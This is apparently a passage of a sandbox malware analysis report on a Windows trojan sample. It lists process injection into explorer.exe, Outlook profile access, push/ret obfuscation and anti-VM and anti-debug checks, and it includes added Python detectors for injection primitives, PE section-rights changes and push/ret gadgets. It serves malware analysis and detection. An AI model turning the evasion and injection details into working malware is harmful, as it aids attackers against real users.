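        if not f:
            continue
        for api in f["apis"].split(","):
            api = api.strip()
            if api.startswith("Nt"):
                calls[int(f["pid"])].add(api)
    return dict(calls)


def injection_primitives(apis):
    """The subset of INJECTION_PRIMITIVES a process actually reaches."""
    return sorted(INJECTION_PRIMITIVES & set(apis))


def suspicious_processes(calls, min_primitives=6):
    """Process indexes that reach at least min_primitives of the injection set."""
    return sorted(pid for pid, apis in calls.items() if len(injection_primitives(apis)) >= min_primitives)


def process_tree(rows):
    """Parent image -> ordered, de-duplicated child images from 'Process created' rows."""
    tree = defaultdict(list)
    for r in rows:
        if r["kind"] != "Process created":
            continue
        child = r["detail"].split()[0]   # image path comes first; none of the report's paths contain spaces
        if child not in tree[r["source"]]:
            tree[r["source"]].append(child)
    return dict(tree)


def render_tree(tree, root="unknown", depth=0):
    """Indented rendering of the chain from a root; the sandbox calls the first parent 'unknown'."""
    lines = []
    for child in tree.get(root, []):
        lines.append("  " * depth + child)
        if child != root:                 # vfpbkeeo.exe spawns itself; do not recurse forever
            lines.extend(render_tree(tree, child, depth + 1))
    return lines


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    calls = nt_calls_by_process(rows)
    for pid in suspicious_processes(calls):
        print(f"process {pid}: {len(injection_primitives(calls[pid]))}/{len(INJECTION_PRIMITIVES)} injection primitives")
    tree = process_tree(rows)
    print("\n".join(render_tree(tree) + render_tree(tree, r"C:\Windows\explorer.exe")))
```

explorer.exe is rendered as a second root on purpose: the report never shows who created it, because it is the existing shell that the payload is injected into, and the cmd.exe it spawns is the process that later touches the Outlook profile keys.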
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    File created: C:\Users\user\AppData\Local\Temp\nsjF9DB.tmp
          Source: classification engine    Classification label: mal100.troj.spyw.evad.winEXE@8/5@12/10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Code function: 0_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\System32\conhost.exe    Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_01
          Source: C:\Windows\explorer.exe    File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe    Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: vfpbkeeo.exe, 00000001.00000003.309270547.000000001A050000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000001.00000003.309553217.0000000019EC0000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: vfpbkeeo.exe, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Unpacked PE file: 3.2.vfpbkeeo.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
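The "Unpacked PE file" row compares the section rights of the image dumped from process 3 (.text:ER;.rdata:R;.data:W;) with those of the file on disk (.text:ER;): the unpacked payload carries sections the dropped file does not, which is what the "Detected unpacking (changes PE section rights)" line in the overview refers to. The script below is an added example, not the report's or Joe Sandbox's code: it reads a PE section table from raw bytes, renders each section's rights in the same E/R/W notation, and diffs two images. The two PE images it works on are built by build_minimal_pe() (constructed headers, not the sample); the .data section is given write-only rights to mirror the report's string, although a normal linker emits RW.

```python
import struct

IMAGE_SCN_CNT_CODE             = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE          = 0x20000000
IMAGE_SCN_MEM_READ             = 0x40000000
IMAGE_SCN_MEM_WRITE            = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"          # IMAGE_SECTION_HEADER, 40 bytes


def section_table(pe):
    """Return (name, virtual address, virtual size, characteristics) for each section."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]        # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]   # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    off = e_lfanew + 24 + opt_size                              # section table follows the optional header
    out = []
    for _ in range(nsec):
        f = struct.unpack_from(SECTION_HDR, pe, off)
        name = f[0].rstrip(b"\0").decode("ascii", "replace")
        out.append((name, f[2], f[1], f[9]))                    # VirtualAddress, VirtualSize, Characteristics
        off += 40
    return out


def rights(chars):
    """E/R/W letters in the order the report prints them."""
    return ("E" if chars & IMAGE_SCN_MEM_EXECUTE else "") + \
           ("R" if chars & IMAGE_SCN_MEM_READ else "") + \
           ("W" if chars & IMAGE_SCN_MEM_WRITE else "")


def rights_string(pe):
    """'.text:ER;.rdata:R;.data:W;' style summary of one image."""
    return "".join(f"{name}:{rights(c)};" for name, _va, _vs, c in section_table(pe))


def section_rights_diff(disk_pe, dumped_pe):
    """Sections whose rights differ between two images, or that exist in only one of them."""
    a = {n: rights(c) for n, _, _, c in section_table(disk_pe)}
    b = {n: rights(c) for n, _, _, c in section_table(dumped_pe)}
    return {n: (a.get(n), b.get(n)) for n in sorted(a.keys() | b.keys()) if a.get(n) != b.get(n)}


def build_minimal_pe(sections):
    """Constructed PE32 headers (no section data) for a list of (name, characteristics)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew
    opt = struct.pack("<H", 0x10B) + b"\0" * 0xDE               # PE32 magic, rest zeroed (0xE0 bytes)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    hdrs, va = b"", 0x1000
    for name, chars in sections:
        hdrs += struct.pack(SECTION_HDR, name.encode().ljust(8, b"\0"), 0x1000, va, 0x200, 0x400, 0, 0, 0, 0, chars)
        va += 0x1000
    return bytes(dos) + b"PE\0\0" + coff + opt + hdrs


CODE_RX = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
# Constructed stand-in for the dropped file: one executable section, like the report's "vs .text:ER;".
DISK_PE = build_minimal_pe([(".text", CODE_RX)])
# Constructed stand-in for the dump: .data is write-only to mirror the report's string.
DUMP_PE = build_minimal_pe([
    (".text", CODE_RX),
    (".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    print(rights_string(DUMP_PE), "vs", rights_string(DISK_PE))
    print(section_rights_diff(DISK_PE, DUMP_PE))
```

On a real dump, feed section_rights_diff() the bytes of the dropped file and of the memory region starting at the image base (0x400000 here); a section whose rights only exist in the dump, or a .text that has gained W, is the unpacking signal this row records.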
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 1_2_00410A64 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_0040A846 push cs; retf
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00411320 push ds; retf
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_0040DC2C pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_0040B4FA push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_0040AD0D push 255F11F9h; retf
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_0041B674 pushad ; retf
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00401E20 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009FD0D1 push ecx; ret
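The push/ret rows above are what the "Uses code obfuscation techniques (call, push, ret)" line in the overview keys on: a push immediately followed by ret, retf or iretd transfers control without a call or jmp, which breaks recursive-descent disassembly and hides the real target; the 3_2_0040AD0D row (push 255F11F9h; retf) shows the immediate-operand form. The scanner below is an added example, not the report's code: it finds these pairs in a raw code buffer using the standard x86 encodings (0x0E, 0x1E, 0x50, 0x51, 0x60 and 0x9C for the single-byte pushes, 0x68 for push imm32, 0xC3, 0xCB and 0xCF for the returns) and, for the immediate form, reports whether the pushed "return address" lands inside the image (a disguised jump) or outside it (dead or decoy bytes). The byte buffer is constructed here so that the first hit reproduces the report's 0040AD0D address; IMAGE_LO and IMAGE_HI are assumptions. Like the sandbox signature itself, this is a linear byte scan with no real disassembly, so a pair that straddles a longer instruction or sits in data is reported too; confirm hits in a disassembler before reading anything into them.

```python
import struct

# Single-byte pushes the report shows paired with a return (opcode -> mnemonic).
ONE_BYTE_PUSH = {0x0E: "push cs", 0x1E: "push ds", 0x50: "push eax",
                 0x51: "push ecx", 0x60: "pushad", 0x9C: "pushfd"}
PUSH_IMM32 = 0x68                                   # push imm32, 5 bytes
RETURNS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}

# Assumed mapped range of the unpacked image (base 0x400000 as in the report; size is a guess).
IMAGE_LO, IMAGE_HI = 0x00400000, 0x00423000


def scan_push_ret(code, base=0):
    """Linear scan for push/ret-style pairs.

    Returns (address, mnemonic text, pushed immediate or None).  No disassembly is
    done, so a pair inside a longer instruction or inside data is reported as well.
    """
    hits = []
    i, n = 0, len(code)
    while i < n - 1:
        op = code[i]
        if op in ONE_BYTE_PUSH and code[i + 1] in RETURNS:
            hits.append((base + i, f"{ONE_BYTE_PUSH[op]}; {RETURNS[code[i + 1]]}", None))
            i += 2
            continue
        if op == PUSH_IMM32 and i + 5 < n and code[i + 5] in RETURNS:
            imm = struct.unpack_from("<I", code, i + 1)[0]
            hits.append((base + i, f"push {imm:08X}h; {RETURNS[code[i + 5]]}", imm))
            i += 6
            continue
        i += 1
    return hits


def classify(hits, lo=IMAGE_LO, hi=IMAGE_HI):
    """'disguised-jump' when the pushed return address lands inside the image,
    'decoy' when it cannot be a valid target, 'gadget' for register/flag pushes."""
    out = []
    for addr, text, imm in hits:
        if imm is None:
            verdict = "gadget"
        elif lo <= imm < hi:
            verdict = "disguised-jump"
        else:
            verdict = "decoy"
        out.append((addr, text, verdict))
    return out


def build_sample():
    """Constructed buffer: NOP padding with the report's pairs placed so that the
    first hit reproduces 0040AD0D 'push 255F11F9h; retf'."""
    buf = bytearray(b"\x90" * 0x30)
    buf[0x0D:0x13] = b"\x68\xF9\x11\x5F\x25\xCB"   # push 255F11F9h; retf
    buf[0x16:0x18] = b"\x0E\xCB"                   # push cs; retf
    buf[0x1A:0x1C] = b"\x51\xC3"                   # push ecx; ret
    buf[0x20:0x22] = b"\x9C\xCF"                   # pushfd; iretd
    buf[0x24:0x2A] = b"\x68\x00\x18\x40\x00\xC3"   # push 00401800h; ret, target inside the image
    return bytes(buf)


SAMPLE_BASE = 0x0040AD00

if __name__ == "__main__":
    for addr, text, verdict in classify(scan_push_ret(build_sample(), SAMPLE_BASE)):
        print(f"{addr:08X}  {text:<24} {verdict}")
```

To run it against the real dump, read the bytes of the 0x400000 region from process 3 and pass the region's start as base; the hit list should then contain the eight 3_2_ addresses listed in the rows above, plus whatever the linear scan picks up inside data.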
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    File created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe    Process information set: NOOPENFILEERRORBOX (13 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe    Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 occurrences)

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Windows\SysWOW64\cmd.exe TID: 5936    Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exe    Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exe    Last function: Thread delayed (2 occurrences)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009D6A60 rdtscp
          Source: C:\Windows\explorer.exe    Window / User API: foregroundWindowGot 889
          Source: C:\Windows\explorer.exe    Window / User API: foregroundWindowGot 862
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 1_2_00A407DA GetSystemInfo,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Code function: 0_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    Code function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 1_2_004089B8 FindFirstFileExW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe    API call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmp    Binary or memory string: @%SystemRoot%\System32\mswsock.dll,-60201-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
          Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmp    Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000003.446841530.000000000834F000.00000004.00000001.00020000.00000000.sdmp    Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000004.00000003.449986076.000000000858E000.00000004.00000001.00020000.00000000.sdmp    Binary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c9
          Source: explorer.exe, 00000004.00000000.322563528.00000000059F0000.00000004.00000001.00020000.00000000.sdmp    Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000004.00000000.327263504.000000000830B000.00000004.00000001.00020000.00000000.sdmp    Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.574282998.0000000008394000.00000004.00000001.00020000.00000000.sdmp    Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.322563528.00000000059F0000.00000004.00000001.00020000.00000000.sdmp    Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SPS
          Source: explorer.exe, 00000004.00000002.576863468.000000000CDEA000.00000004.00000001.00020000.00000000.sdmp    Binary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000004.00000003.565329897.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.577506261.000000000D009000.00000004.00000001.00020000.00000000.sdmp    Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
          Source: explorer.exe, 00000004.00000003.451089971.000000000CFB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.447484524.000000000CFB1000.00000004.00000001.00020000.00000000.sdmp    Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmp    Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 1_2_0040B06F GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009D6A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 1_2_00A4005F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 1_2_00A4013E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 1_2_00A40109 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 1_2_00A4017B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009A9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009DF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009DF0BF mov eax, dword ptr fs:[00000030h] (2 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00A23884 mov eax, dword ptr fs:[00000030h] (2 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h] (5 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00A3B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h] (4 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00A74015 mov eax, dword ptr fs:[00000030h] (2 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00A27016 mov eax, dword ptr fs:[00000030h] (3 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009C0050 mov eax, dword ptr fs:[00000030h] (2 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00A71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00A62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009DA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009CC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009AB1E1 mov eax, dword ptr fs:[00000030h] (3 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009A9100 mov eax, dword ptr fs:[00000030h] (3 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009D513A mov eax, dword ptr fs:[00000030h] (2 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h] (4 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009C4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009CB944 mov eax, dword ptr fs:[00000030h] (2 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009AB171 mov eax, dword ptr fs:[00000030h] (2 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009DD294 mov eax, dword ptr fs:[00000030h] (2 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009BAAB0 mov eax, dword ptr fs:[00000030h] (2 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009DFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h] (5 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009C3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00A5B260 mov eax, dword ptr fs:[00000030h] (2 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_00A78A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h] (4 accesses)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe    Code function: 3_2_009E927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A75BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A5D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A6138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A6131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009ADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009ADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78B58 mov eax, dword ptr fs:[00000030h]
